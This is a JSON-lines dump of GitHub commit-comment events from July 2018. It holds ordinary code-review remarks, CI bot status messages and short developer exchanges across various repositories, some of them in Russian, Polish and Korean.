{"id":"7978514642","type":"CommitCommentEvent","actor":{"login":"LTLA"},"repo":{"name":"drisso/SingleCellExperiment"},"payload":{"comment":{"id":29739156,"position":null,"line":null,"path":null,"commit_id":"a2dbb95c975277d39f423f4cdd15343affacc560","created_at":"2018-07-17T18:33:56Z","updated_at":"2018-07-17T18:33:56Z","author_association":"COLLABORATOR","body":"I don't know either, I was also wondering that. Most of my package repos don't even have `README`s."}},"created_at":"2018-07-17T18:33:56Z"}
{"id":"7978517263","type":"CommitCommentEvent","actor":{"login":"sekmenhuseyin"},"repo":{"name":"stevenwanderski/bxslider-4"},"payload":{"comment":{"id":29739163,"position":3,"line":2,"path":"src/js/jquery.bxslider.js","commit_id":"6380794bcdc9a15f6fe8078463267e34bf39e5aa","created_at":"2018-07-17T18:34:26Z","updated_at":"2018-07-17T18:34:26Z","author_association":"COLLABORATOR","body":"yes"}},"created_at":"2018-07-17T18:34:26Z"}
{"id":"7978518371","type":"CommitCommentEvent","actor":{"login":"sage365"},"repo":{"name":"1Epoch/Face-Recognition"},"payload":{"comment":{"id":29739168,"position":null,"line":null,"path":null,"commit_id":"f44d2b0903fcfe563a1d9e487a3ace1a7e1c09c4","created_at":"2018-07-17T18:34:38Z","updated_at":"2018-07-17T18:34:38Z","author_association":"CONTRIBUTOR","body":"Added assets"}},"created_at":"2018-07-17T18:34:38Z"}
{"id":"7978522254","type":"CommitCommentEvent","actor":{"login":"LTLA"},"repo":{"name":"drisso/SingleCellExperiment"},"payload":{"comment":{"id":29739174,"position":null,"line":null,"path":null,"commit_id":"a2dbb95c975277d39f423f4cdd15343affacc560","created_at":"2018-07-17T18:35:24Z","updated_at":"2018-07-17T18:35:24Z","author_association":"COLLABORATOR","body":"I mean, you can tell I didn't write it, because each line is not a sentence."}},"created_at":"2018-07-17T18:35:24Z"}
{"id":"7978526053","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29739186,"position":20,"line":20,"path":"Project Euler Problem 3/Program.cs","commit_id":"4bd9a472a5d9e72e10f0a62516eba77453486d63","created_at":"2018-07-17T18:36:11Z","updated_at":"2018-07-17T18:36:11Z","author_association":"COLLABORATOR","body":"I like the use of !number, BUT the usual convention is for for-loops to use an \"x < y\" type condition (i.e. comparing one number against another number) and for while-loops to use an \"is this thing true\" type condition (i.e. is a boolean true or not?). What you've done might work, but would confuse someone (only slightly, mind) because it goes against convention."}},"created_at":"2018-07-17T18:36:11Z"}
{"id":"7978527278","type":"CommitCommentEvent","actor":{"login":"elektroschmock"},"repo":{"name":"elektroschmock/android_device_moto_shamu"},"payload":{"comment":{"id":29739189,"position":null,"line":null,"path":null,"commit_id":"daf02e426dfeb632294daa66b9a9a3ac995983f0","created_at":"2018-07-17T18:36:25Z","updated_at":"2018-07-17T18:36:25Z","author_association":"OWNER","body":"Those values are just for testing.\r\nBut I have no idea how you came up with such a high hispeedfreq or those target loads.\r\nIn all my test there was never a need to have a highsppedfreq above 1,19 Ghz.\r\nHave you done your tests with the new power hal? If not your values are outdated."}},"created_at":"2018-07-17T18:36:25Z"}
{"id":"7978533165","type":"CommitCommentEvent","actor":{"login":"kamuran93"},"repo":{"name":"saitho/ng2-smart-table"},"payload":{"comment":{"id":29739196,"position":null,"line":null,"path":null,"commit_id":"a8312a8d50f9d6e27777553c4539f4719fecc550","created_at":"2018-07-17T18:37:37Z","updated_at":"2018-07-17T18:37:37Z","author_association":"NONE","body":"Thanx for explanation. As ı say ım new at qngular can you offer a comdortable data table yo me ?\n\niOS için Outlook<https://aka.ms/o0ukef> uygulamasını edinin\n________________________________\nFrom: Mario Lubenka <notifications@github.com>\nSent: Tuesday, July 17, 2018 8:50:13 PM\nTo: saitho/ng2-smart-table\nCc: Kamuran Engin; Comment\nSubject: Re: [saitho/ng2-smart-table] feat(datepicker): Adds datepicker editor, filter and view mode. (a8312a8)\n\n\nHi,\nthe source on GitHub has not been compiled for use with NPM.\nI also don't plan on doing that, as it would - ideally - be merged with the original project and released with their release methods... Not sure when that will happen though. ^^\nI am currently not using my changes myself - I might at some point and then compile the sources myself and put it up in another repository. Also not sure how to do that as I haven't released many Angular packages onto NPM. ^^\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/saitho/ng2-smart-table/commit/a8312a8d50f9d6e27777553c4539f4719fecc550#commitcomment-29738556>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AlRe011zFI9hBgy2BXGAF2aJMq87yvTJks5uHiPVgaJpZM4VTBpO>.\n"}},"created_at":"2018-07-17T18:37:37Z"}
{"id":"7978533506","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29739197,"position":14,"line":37,"path":"commands/UserLogController.php","commit_id":"fd6b6b2fddcf1658114ae3dcbf055b84763f57fe","created_at":"2018-07-17T18:37:41Z","updated_at":"2018-07-17T18:37:41Z","author_association":"OWNER","body":"да:) есть такое"}},"created_at":"2018-07-17T18:37:41Z"}
{"id":"7978535377","type":"CommitCommentEvent","actor":{"login":"asci"},"repo":{"name":"asci/lokka-hoc"},"payload":{"comment":{"id":29739200,"position":4,"line":38,"path":"src/lokkifyFactory.js","commit_id":"60aa07bb48d8af59f0594ef2b0a5a77a6bed6f3d","created_at":"2018-07-17T18:38:02Z","updated_at":"2018-07-17T18:38:02Z","author_association":"OWNER","body":"💩 "}},"created_at":"2018-07-17T18:38:02Z"}
{"id":"7978535548","type":"CommitCommentEvent","actor":{"login":"drisso"},"repo":{"name":"drisso/SingleCellExperiment"},"payload":{"comment":{"id":29739201,"position":null,"line":null,"path":null,"commit_id":"a2dbb95c975277d39f423f4cdd15343affacc560","created_at":"2018-07-17T18:38:04Z","updated_at":"2018-07-17T18:38:04Z","author_association":"OWNER","body":"OK, I'll just strip most of it and leave just the badges... the only reason for the readme file is to show off the test coverage!"}},"created_at":"2018-07-17T18:38:04Z"}
{"id":"7978536650","type":"CommitCommentEvent","actor":{"login":"dlg99"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29739203,"position":7,"line":261,"path":"bookkeeper-server/src/main/java/org/apache/bookkeeper/proto/BookieServer.java","commit_id":"d7867d94b3bf108e8f986b5abafa6980ddec0feb","created_at":"2018-07-17T18:38:17Z","updated_at":"2018-07-17T18:38:17Z","author_association":"CONTRIBUTOR","body":"I'd add a log message before shutdown(), something like LOG.warn(\"Uncaught exception handler triggered\", e)"}},"created_at":"2018-07-17T18:38:17Z"}
{"id":"7978540346","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29739219,"position":6,"line":4,"path":"cron/prod.cron","commit_id":"5cea7d887410856f9e99fbc1bf2ff7a28473acb1","created_at":"2018-07-17T18:39:03Z","updated_at":"2018-07-17T18:39:03Z","author_association":"OWNER","body":"Хорошо"}},"created_at":"2018-07-17T18:39:03Z"}
{"id":"7978542953","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29739224,"position":15,"line":38,"path":"commands/UserLogController.php","commit_id":"fd6b6b2fddcf1658114ae3dcbf055b84763f57fe","created_at":"2018-07-17T18:39:34Z","updated_at":"2018-07-17T18:39:34Z","author_association":"OWNER","body":"Думаю да"}},"created_at":"2018-07-17T18:39:34Z"}
{"id":"7978543585","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29739225,"position":14,"line":37,"path":"commands/UserLogController.php","commit_id":"fd6b6b2fddcf1658114ae3dcbf055b84763f57fe","created_at":"2018-07-17T18:39:42Z","updated_at":"2018-07-17T18:39:42Z","author_association":"OWNER","body":"есть такое:)"}},"created_at":"2018-07-17T18:39:42Z"}
{"id":"7978544287","type":"CommitCommentEvent","actor":{"login":"VetusLudaeus"},"repo":{"name":"VetusLudaeus/Lo1la"},"payload":{"comment":{"id":29739229,"position":5,"line":18,"path":"Lola.py","commit_id":"b099f68c314d7d62652d17e42952f167a616d3df","created_at":"2018-07-17T18:39:51Z","updated_at":"2018-07-17T18:39:51Z","author_association":"OWNER","body":"Этот цикл должен быть \"зациклен\""}},"created_at":"2018-07-17T18:39:51Z"}
{"id":"7978544753","type":"CommitCommentEvent","actor":{"login":"dlg99"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29739230,"position":8,"line":262,"path":"bookkeeper-server/src/main/java/org/apache/bookkeeper/proto/BookieServer.java","commit_id":"d7867d94b3bf108e8f986b5abafa6980ddec0feb","created_at":"2018-07-17T18:39:57Z","updated_at":"2018-07-17T18:39:57Z","author_association":"CONTRIBUTOR","body":"Am I right that BDW's end of loop is not the only possible reason to get here? i.e. real uncaught exception can happen. I'd trade this log message for the one before shutdown()"}},"created_at":"2018-07-17T18:39:57Z"}
{"id":"7978546429","type":"CommitCommentEvent","actor":{"login":"ethanfrogers"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29739236,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T18:40:17Z","updated_at":"2018-07-17T18:40:17Z","author_association":"NONE","body":"I agree with @lwander since they're all `kubernetes` regardless of the provider account version."}},"created_at":"2018-07-17T18:40:17Z"}
{"id":"7978547712","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29739239,"position":null,"line":null,"path":null,"commit_id":"911a12b12ef8a457b8a9eff4657c2b8ef7a3030d","created_at":"2018-07-17T18:40:31Z","updated_at":"2018-07-17T18:40:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-796](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-796).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-796-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-17T18:40:31Z"}
{"id":"7978548335","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29739240,"position":107,"line":388,"path":"src/main/java/net/pms/util/CoverArtArchiveUtil.java","commit_id":"b59d4c3a2975952d8cca28ee62fdfc89d46427f8","created_at":"2018-07-17T18:40:38Z","updated_at":"2018-07-17T18:40:38Z","author_association":"CONTRIBUTOR","body":"Typo: \"store it\""}},"created_at":"2018-07-17T18:40:38Z"}
{"id":"7978548369","type":"CommitCommentEvent","actor":{"login":"straight-shoota"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29739241,"position":6,"line":59,"path":"spec/config_spec.cr","commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-17T18:40:38Z","updated_at":"2018-07-17T18:40:38Z","author_association":"CONTRIBUTOR","body":"Speccing the type of a constant is pretty much unnecessary."}},"created_at":"2018-07-17T18:40:38Z"}
{"id":"7978551323","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29739248,"position":null,"line":null,"path":null,"commit_id":"0446ba6795144496cfb0f081e7009883eba7c6a1","created_at":"2018-07-17T18:41:15Z","updated_at":"2018-07-17T18:41:15Z","author_association":"OWNER","body":"В общем, идея с триггером хорошая, но не совсем согласен с методом добавления элемента в таблицу. "}},"created_at":"2018-07-17T18:41:15Z"}
{"id":"7978552010","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29739251,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-17T18:41:23Z","updated_at":"2018-07-17T18:41:23Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-17T18:41:23Z"}
{"id":"7978556208","type":"CommitCommentEvent","actor":{"login":"mehul-m-prajapati"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29739256,"position":169,"line":302,"path":"modules/redisq/logqueue-redis.c","commit_id":"9d591dd1acda5c985d737230fab632356b8f48ac","created_at":"2018-07-17T18:42:11Z","updated_at":"2018-07-17T18:42:11Z","author_association":"CONTRIBUTOR","body":"I think it should be generated in the ``new`` as a default value."}},"created_at":"2018-07-17T18:42:11Z"}
{"id":"7978557060","type":"CommitCommentEvent","actor":{"login":"carolw21"},"repo":{"name":"FBX-2018-TeamTBD/goals"},"payload":{"comment":{"id":29739260,"position":31,"line":31,"path":"app/src/main/java/com/example/cassandrakane/goalz/AddGoalActivity.java","commit_id":"122d74679761649f9440286fc1f2b768ddf35aa3","created_at":"2018-07-17T18:42:20Z","updated_at":"2018-07-17T18:42:20Z","author_association":"COLLABORATOR","body":"Ok, will do."}},"created_at":"2018-07-17T18:42:20Z"}
{"id":"7978557910","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29739262,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-17T18:42:30Z","updated_at":"2018-07-17T18:42:30Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-17T18:42:30Z"}
{"id":"7978558241","type":"CommitCommentEvent","actor":{"login":"ypiguet-epfl"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":29739264,"position":null,"line":null,"path":null,"commit_id":"5a7b3f641c616146d1f8cdadadc04c9d9b6eec61","created_at":"2018-07-17T18:42:34Z","updated_at":"2018-07-17T18:42:34Z","author_association":"COLLABORATOR","body":"The title should read \"Requirements\" instead of \"Requierements\"."}},"created_at":"2018-07-17T18:42:34Z"}
{"id":"7978558591","type":"CommitCommentEvent","actor":{"login":"mhevery"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29739265,"position":19,"line":19,"path":"CHANGELOG.md","commit_id":"b9e095aa31f0706307fb4633ccd02b645b915d6b","created_at":"2018-07-17T18:42:38Z","updated_at":"2018-07-17T18:42:38Z","author_association":"MEMBER","body":"Yes, that must have been a mistake. Given this is not breaking, I don't think there is much to do. "}},"created_at":"2018-07-17T18:42:38Z"}
{"id":"7978559959","type":"CommitCommentEvent","actor":{"login":"AzarthMZintos"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29739269,"position":null,"line":null,"path":null,"commit_id":"a5588dd9ab00d33e9e09c8cc4b34a83710dcc3c6","created_at":"2018-07-17T18:42:55Z","updated_at":"2018-07-17T18:42:55Z","author_association":"NONE","body":"I get this erro when i enable the feature at login server\r\nmake_listen_bind: bind failed (socket #1, error 10048: unknown error)!   anyideia?"}},"created_at":"2018-07-17T18:42:55Z"}
{"id":"7978563903","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29739277,"position":15,"line":71,"path":"src/librustc_mir/borrow_check/error_reporting.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-17T18:43:42Z","updated_at":"2018-07-17T18:43:42Z","author_association":"COLLABORATOR","body":"Nit: maybe we should add a method like `buffer(&mut self.errors_buffer)` just to keep this method chain looking pretty?\r\n\r\n"}},"created_at":"2018-07-17T18:43:42Z"}
{"id":"7978565852","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739282,"position":20,"line":18,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:44:06Z","updated_at":"2018-07-17T18:44:06Z","author_association":"COLLABORATOR","body":"why did this code change?"}},"created_at":"2018-07-17T18:44:06Z"}
{"id":"7978566597","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29739284,"position":15,"line":71,"path":"src/librustc_mir/borrow_check/error_reporting.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-17T18:44:14Z","updated_at":"2018-07-17T18:44:14Z","author_association":"COLLABORATOR","body":"Alternatively, I would do:\r\n\r\n```rust\r\nself.errors_buffer.push(\r\n    self.tcx.cannot_act_on_uninitialized_variable(...).span_label(...)\r\n);\r\n```"}},"created_at":"2018-07-17T18:44:14Z"}
{"id":"7978566608","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29739285,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T18:44:14Z","updated_at":"2018-07-17T18:44:14Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T18:44:14Z"}
{"id":"7978567155","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739287,"position":61,"line":39,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:44:21Z","updated_at":"2018-07-17T18:44:21Z","author_association":"COLLABORATOR","body":"why did this code change?"}},"created_at":"2018-07-17T18:44:21Z"}
{"id":"7978568973","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739289,"position":92,"line":70,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:44:43Z","updated_at":"2018-07-17T18:44:43Z","author_association":"COLLABORATOR","body":"why did this code change?"}},"created_at":"2018-07-17T18:44:43Z"}
{"id":"7978573597","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29739304,"position":98,"line":370,"path":"src/librustc_mir/borrow_check/move_errors.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-17T18:45:36Z","updated_at":"2018-07-17T18:45:36Z","author_association":"COLLABORATOR","body":"why these self -> &self diffs?"}},"created_at":"2018-07-17T18:45:36Z"}
{"id":"7978573651","type":"CommitCommentEvent","actor":{"login":"abbottry"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29739305,"position":6,"line":324,"path":"app/assets/javascripts/models/data/query.js.coffee","commit_id":"3ce2be4254740b93c319b36640d60979f12433f6","created_at":"2018-07-17T18:45:36Z","updated_at":"2018-07-17T18:45:36Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-17T18:45:36Z"}
{"id":"7978577998","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739314,"position":187,"line":136,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:46:29Z","updated_at":"2018-07-17T18:46:29Z","author_association":"COLLABORATOR","body":"this check makes no sense to me here. decrypt will fail anyway when you enter the wrong password"}},"created_at":"2018-07-17T18:46:29Z"}
{"id":"7978580440","type":"CommitCommentEvent","actor":{"login":"gabrieldotkang"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29739315,"position":1294,"line":582,"path":"src/edu/cmu/tartan/Game.java","commit_id":"da4a10387a092d57cf629545e130bb7e064a7ef2","created_at":"2018-07-17T18:46:58Z","updated_at":"2018-07-17T18:46:58Z","author_association":"COLLABORATOR","body":"player.getCollectedItems().size() => player.getCollectedItems().size().isempty()로 바꾸는 것 검토"}},"created_at":"2018-07-17T18:46:58Z"}
{"id":"7978580646","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29739316,"position":null,"line":null,"path":null,"commit_id":"2d632e3bb5e7625c97ea510addc28fc0f89bb88e","created_at":"2018-07-17T18:47:00Z","updated_at":"2018-07-17T18:47:00Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-81](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-81).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-81-next50.pantheonsite.io/)"}},"created_at":"2018-07-17T18:47:00Z"}
{"id":"7978584359","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"kredki/StarterKitChess"},"payload":{"comment":{"id":29739321,"position":null,"line":null,"path":null,"commit_id":"dcd60d39dcefc6852c26291a3402099716b5495f","created_at":"2018-07-17T18:47:46Z","updated_at":"2018-07-17T18:47:46Z","author_association":"NONE","body":"używaj dedykowane wyjątki;\r\nvalidator.validate() should be under //when ;\r\nmetoda isBlackFirstMove -  po co sprawdzasz tam board .getaPieceAt?"}},"created_at":"2018-07-17T18:47:46Z"}
{"id":"7978587558","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29739323,"position":null,"line":null,"path":null,"commit_id":"db072f2ba4ed5e65a08f8db648912d49dace4fea","created_at":"2018-07-17T18:48:26Z","updated_at":"2018-07-17T18:48:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-394](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-394).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-394-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T18:48:26Z"}
{"id":"7978588500","type":"CommitCommentEvent","actor":{"login":"yufangqq"},"repo":{"name":"lucieleblanc/CodeU-Summer-2018"},"payload":{"comment":{"id":29739327,"position":null,"line":null,"path":null,"commit_id":"8cb246479d1bfc6074a4ddd6e72e085c4876cade","created_at":"2018-07-17T18:48:39Z","updated_at":"2018-07-17T18:48:39Z","author_association":"COLLABORATOR","body":"@VillanuevaK @laurenfraser2 FYI. I made this commit that fixed the unit test in master branch."}},"created_at":"2018-07-17T18:48:39Z"}
{"id":"7978595823","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739344,"position":194,"line":144,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:50:06Z","updated_at":"2018-07-17T18:50:06Z","author_association":"COLLABORATOR","body":"this makes no sense to me which old signing key? looks like a copy / past mistake to me"}},"created_at":"2018-07-17T18:50:06Z"}
{"id":"7978598459","type":"CommitCommentEvent","actor":{"login":"edridgedsouza"},"repo":{"name":"edridgedsouza/rtv"},"payload":{"comment":{"id":29739351,"position":null,"line":null,"path":null,"commit_id":"84f1c75ee317270cce47cb84a794fb5b74a0d485","created_at":"2018-07-17T18:50:36Z","updated_at":"2018-07-17T18:50:36Z","author_association":"OWNER","body":"*builds"}},"created_at":"2018-07-17T18:50:36Z"}
{"id":"7978603506","type":"CommitCommentEvent","actor":{"login":"posox"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29739359,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T18:51:33Z","updated_at":"2018-07-17T18:51:33Z","author_association":"OWNER","body":"@lwander @ethanfrogers `kubernetesCloudProvider.getID()` is ok for type?"}},"created_at":"2018-07-17T18:51:33Z"}
{"id":"7978603926","type":"CommitCommentEvent","actor":{"login":"mfricke1947"},"repo":{"name":"mfricke1947/github-slideshow"},"payload":{"comment":{"id":29739361,"position":5,"line":5,"path":"_posts/0000-01-02-mfricke1947.md","commit_id":"e5e42f58a34e0558afd2f8eeeec63d5d38b92967","created_at":"2018-07-17T18:51:38Z","updated_at":"2018-07-17T18:51:38Z","author_association":"OWNER","body":"fasdfasd witty"}},"created_at":"2018-07-17T18:51:38Z"}
{"id":"7978604260","type":"CommitCommentEvent","actor":{"login":"Shemplo"},"repo":{"name":"AlienCoffee/Jap-Converter"},"payload":{"comment":{"id":29739362,"position":null,"line":null,"path":null,"commit_id":"1dc69b74c6185fa13f51dc51eddd82a030b01a7f","created_at":"2018-07-17T18:51:42Z","updated_at":"2018-07-17T18:51:42Z","author_association":"CONTRIBUTOR","body":"Круто, но надо добавить генерацию файла xlsx"}},"created_at":"2018-07-17T18:51:42Z"}
{"id":"7978605999","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"Alexpux/MINGW-packages"},"payload":{"comment":{"id":29739369,"position":null,"line":null,"path":null,"commit_id":"080bc0b08cd9116f625a42cb7a569b2115289f89","created_at":"2018-07-17T18:52:03Z","updated_at":"2018-07-17T18:52:03Z","author_association":"NONE","body":"@Alexpux\r\n\r\nI work quite a bit with Ruby, and I have a build system that's used to build and test master/trunk.  Ruby requires `--enable-libgdbm-compat`, and for several recent versions, it has been `--disable-libgdbm-compat`, so a custom 1.10 package was being used.  Your last commit enabled it, so I tried using the package for Ruby.  Running Ruby's tests, there was a failure in `reorganize`.\r\n\r\nAdding the following to the top of `'recover.c' allowed the test to pass:\r\n```\r\n#if !HAVE_RENAME\r\n#if defined(_WIN32)\r\nstatic int\r\n_gdbm_rename (char *old_name, char *new_name)\r\n{\r\n  if (!MoveFileEx (old_name, new_name, MOVEFILE_REPLACE_EXISTING))\r\n    return -1;\r\n\r\n  return 0;\r\n}\r\n#define rename _gdbm_rename\r\n#endif\r\n#endif\r\n```\r\n\r\nI'm not really a c type, so I thought I'd report it rather than do a PR.  If you'd prefer a PR, I'd be happy to file one.\r\n\r\nThanks for all your work, Greg\r\n"}},"created_at":"2018-07-17T18:52:03Z"}
{"id":"7978606004","type":"CommitCommentEvent","actor":{"login":"awmottaz"},"repo":{"name":"MatteoGabriele/vue-progressive-image"},"payload":{"comment":{"id":29739370,"position":null,"line":null,"path":null,"commit_id":"a3793d7766eb1160d5a76ba68a2d03273f2c5dd6","created_at":"2018-07-17T18:52:03Z","updated_at":"2018-07-17T18:52:03Z","author_association":"NONE","body":"This is great, but what if I want to add multiple classes?"}},"created_at":"2018-07-17T18:52:03Z"}
{"id":"7978608905","type":"CommitCommentEvent","actor":{"login":"mfricke1947"},"repo":{"name":"mfricke1947/github-slideshow"},"payload":{"comment":{"id":29739376,"position":null,"line":null,"path":null,"commit_id":"e5e42f58a34e0558afd2f8eeeec63d5d38b92967","created_at":"2018-07-17T18:52:37Z","updated_at":"2018-07-17T18:52:37Z","author_association":"OWNER","body":"sdfasd"}},"created_at":"2018-07-17T18:52:37Z"}
